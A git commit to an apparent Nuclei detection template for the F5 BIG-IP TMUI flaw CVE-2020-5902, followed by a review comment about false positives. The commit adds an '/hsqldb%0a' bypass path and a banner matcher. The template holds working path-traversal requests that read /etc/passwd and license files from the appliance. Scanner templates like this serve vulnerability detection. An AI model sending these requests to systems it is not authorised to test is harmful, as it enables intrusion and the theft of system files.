CVE-2020-5902 added hsqldb bypass

patch-1
ringo 2020-08-22 19:37:43 -05:00
parent 7b1c5403e4
commit 986a49f6d1
1 changed files with 4 additions and 2 deletions


@ -2,7 +2,7 @@ id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
author: madrobot & dwisiswant0
author: madrobot & dwisiswant0 & ringo
severity: high
requests:
@ -11,6 +11,7 @@ requests:
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
- "{{BaseURL}}/hsqldb%0a"
matchers-condition: and
matchers:
- type: status
@ -21,6 +22,7 @@ requests:
- "root:[x*]:0:0:"
- "BIG-IP release ([\\d.]+)"
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
- "HSQL Database Engine Servlet"
condition: or
part: body
- raw:
@ -59,4 +61,4 @@ requests:
- 200
- type: word
words:
- "h3ll0_w0Rld"
- "h3ll0_w0Rld"
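Review bot: The new `"HSQL Database Engine Servlet"` entry joins the same `condition: or` list that is evaluated for every path in this request block, and that string is the stock HSQLDB servlet banner rather than anything F5-specific, so any host answering 200 with that banner on `/hsqldb%0a` would be reported as CVE-2020-5902. Consider moving the `/hsqldb%0a` path into its own request block whose matchers pair the banner with a BIG-IP indicator, so a hit is tied to the product and not to any exposed HSQLDB servlet. A comment above the new path would also help triage, e.g. `# hsqldb%0a: servlet still reachable despite the httpd workaround; host needs the fixed release, not only the mitigation`; that intent is inferred from the commit title, so confirm the wording. The matcher's `type:` line and the start of the request block lie outside the visible hunks.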